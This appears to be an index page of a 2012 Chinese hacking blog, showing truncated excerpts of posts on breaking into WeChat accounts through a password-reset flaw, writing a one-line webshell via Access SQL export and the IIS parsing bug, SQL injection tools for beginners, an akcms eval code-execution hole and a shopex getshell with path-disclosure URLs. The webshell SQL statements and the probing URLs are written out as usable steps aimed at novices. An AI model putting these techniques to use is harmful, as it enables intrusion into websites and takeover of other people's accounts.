微信爆出漏洞!马化腾微信被盗!

分类:新闻 | 2012-10-21 | 撸过 768 次
3人扯谈

    在前不久,有极客网友根据电话采访周鸿祎的视频拨号声,分析出了周鸿祎的电话号码。此事一经报道,立刻在社会中传播开来。极客探究和不留后患的做法甚至得到了社会各界的广泛认可。周鸿祎得知后亲自抛出了橄榄枝。19日下午,有网友向本网提供消息,在WooYun 论坛又有一位极具实力的极客(黑客),他通过利用微信账号安全的设置漏洞,成功地破解了多为名人的微信账号,并公布为证。

目前该极客已经成功破解了柳岩、马化腾的微信账号。不知他会不会得到马化腾的垂青呢?漏洞及破解具体过程如下:

今天发现个微信群发的漏洞。还没玩。就被修补了。

于是就有了这个漏洞的产生。

同样问题产生在重置用户密码的环节。[......]

继续阅读

ACCESS执行SQL语句导出一句话拿webshell

分类:安全 | 2012-10-12 | 撸过 1,060 次
1人扯谈

实用环境,在access后台其他方法不能拿到webshell
但是后台有SQL语句查询执行,就可以直接access导出一句话拿webshell了
不过需要知道物理路径才能导出,利用IIS的解析漏洞导出EXCEL文件拿到webshell,因为ACCESS数据库不允许导出其他危险格式。
至于怎么拿到物理路径就看你自己发挥了,报错或备份路径等。

逐一执行以下语句就可以导出一句话了
第一句代码

create table cmd (a varchar(50))

第二句代码

insert into cmd (a) values ('一句话木马')

 
第三句代码

select * into [a] i[......]

继续阅读

学会使用这些工具,你就是合格的新手!

分类:安全 | 2012-10-12 | 撸过 2,902 次
3人扯谈

SQL Injection:
啊D            算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手
明小子       比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的
NBSI        这个软件对于SQL server的注入有极高的准确率
Pangolin  俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多种数据库都能注入
Havij       国外的注入软件,比穿山甲好点,但是是英文的,也支持各种平台

Web Scanner[......]

继续阅读

akcms 代码执行漏洞

分类:安全 | 2012-10-8 | 撸过 725 次
1人扯谈

    上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。

0x01、原理分析

漏洞问题主要存在于include\common.func.php文件中的ak_if函数,先看下代码

akcms 代码执行漏洞

eval函数参数中的变量$variable未作任何的处理变插入到了函数中。ak_if这个函数的主要用途是,提供给建站用户一个简单的逻辑判断功能的接口。对比一下4.1版本中的这段代码

akcms 代码执行漏洞

可以发现,相差了eval函数调用的语句。在4.1.[......]

继续阅读

shopex前台普通用户getshell最新漏洞

分类:安全 | 2012-10-8 | 撸过 530 次
0人扯谈

第一个:想办法找到目标网站的绝对路径

http://www.webshell.cc/install/svinfo.php?phpinfo=true
https://www.webshell.cc/core/api/shop_api.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_cat.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0_goodstype.php
https://www.webshell.cc/core/api/site/2.0/api_b2b_2_0[......]

继续阅读